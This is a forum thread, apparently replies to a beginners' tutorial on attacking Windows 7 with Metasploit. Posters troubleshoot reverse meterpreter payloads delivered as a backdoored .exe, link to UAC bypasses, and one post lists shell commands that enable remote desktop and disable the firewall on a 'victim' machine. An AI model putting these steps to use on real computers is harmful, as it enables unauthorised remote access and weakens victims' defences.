[HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

[LHYX1]

Hi everyone. I'm italian so my english isn't correct xD
So... i've a problem with meterpreter: when i create it it's ok.
in lhost i set my external address and in the msfconsole my internal address but when in an other computer (it isn't in my lan) open the file nothing appends, msfconsole receives nothing. Why?
I do all correctly but... i don't know.
Anyone can help me?
Thanks

Again: Sorry for my bad english

TheAppleMan

Did you set up portforwarding ?

[spudgunman]

I was able to make a script only demo of UAC workaround

http://www.backtrack-linux.org/forum...s-control.html

[TheAppleMan]

Did you set up portforwarding ?

Hem.... no!
Thanks a lot.
Bye

[iproute]

I'm surprised that so many people attempt to use metasploit over the internet, and do not know that they need to set up port forwarding, or do not know how. It really pays to have this knowledge first, as using metasploit over the internet is already questionable enough as it is, and our moderators may view this as potentially illegal activity. Not meaning any offense, just something for people to keep in mind.

[ricofear]

when i'm trying to make the backdoored .exe I get this message

Code:

./lib/rex/logging/sinks/flatfile.rb:20:in `initialize': Permission denied - /home/rico/.msf3/logs/framework.log (Errno::EACCES)             
        from ./lib/rex/logging/sinks/flatfile.rb:20:in `new'          
        from ./lib/rex/logging/sinks/flatfile.rb:20:in `initialize'   
        from ./lib/msf/base/logging.rb:23:in `new'                    
        from ./lib/msf/base/logging.rb:23:in `init'                   
        from ./lib/msf/base/simple/framework.rb:100:in `simplify'
        from ./lib/msf/base/simple/framework.rb:71:in `create'
        from ./msfpayload:40
./lib/rex/logging/sinks/flatfile.rb:20:in `initialize': Permission denied - /home/rico/.msf3/logs/framework.log (Errno::EACCES)
        from ./lib/rex/logging/sinks/flatfile.rb:20:in `new'
        from ./lib/rex/logging/sinks/flatfile.rb:20:in `initialize'
        from ./lib/msf/base/logging.rb:23:in `new'
        from ./lib/msf/base/logging.rb:23:in `init'
        from ./lib/msf/base/simple/framework.rb:100:in `simplify'
        from ./lib/msf/base/simple/framework.rb:71:in `create'
        from ./msfencode:207

what's the matter? I've installed/uninstalled metasploit 10 times :/

[khero]

Thank you for the information.

In order to use this on windows7 you need to specify the payload to be 64x bit.
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Also most of the people will have hard time connecting to Win7 due to UAC priviledges.
Although there is cool script to bypass the uac.
check this site:
http://www.secmaniac.com/december-20...s-windows-uac/

[lupin]

i know this question lies totally out of the topic.. but do the classic metasploit payloads and exploits work for win7 target platforms?

Depends. A number of the payloads do, as long as you get the CPU architecture right. Most of the payloads are essentially shellcode, and as long as that shellcode uses Windows functions available in Windows 7, doesn't run afoul of any new privilege restricting features and also uses a compatible method for finding the address of kernel32 it should work fine on Windows 7. If you check the asm source (also here and here) for some of these payloads you will actually see that some of them make specific reference to Windows 7.

Exploits for third party apps that work on Windows XP may also work on Windows 7. Older exploits for Operating Systems components in Windows XP that have since been patched probably wont work on Windows 7.

In order to use this on windows7 you need to specify the payload to be 64x bit.
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Only if you are using a 64 bit version of Windows 7...

[khero]

Only if you are using a 64 bit version of Windows 7...

Thanks for the correction, I meant Win7 64 bit but was a bit tired ^^

[green0ne]

{Prepare for RDP}

Code:

shell
# Connect to CMD

reg add "hklm\system\currentControlSet\Control\Termina l Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
# Allows incoming terminal service connections

reg add "hklm\system\currentControlSet\Control\Termina l Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
# Disables blocking incoming Terminal service connections

Netsh firewall set opmode enable
# Enable Firewall on Victim

Netsh firewall set opmode disable
# Disable Firewall on Victim

Just a question from a n00b but shouldn't:

"# Disables blocking incoming Terminal service connections"

be before

"# Allows incoming terminal service connections" ?

If not why? Wouldn't you want to disable the "blocking" before "allowing" the incoming?
I'm not critisizing at all just curious of what the best way should be.

Thanks!

[HackerForce]

nice tutorial!

does this work on xp too?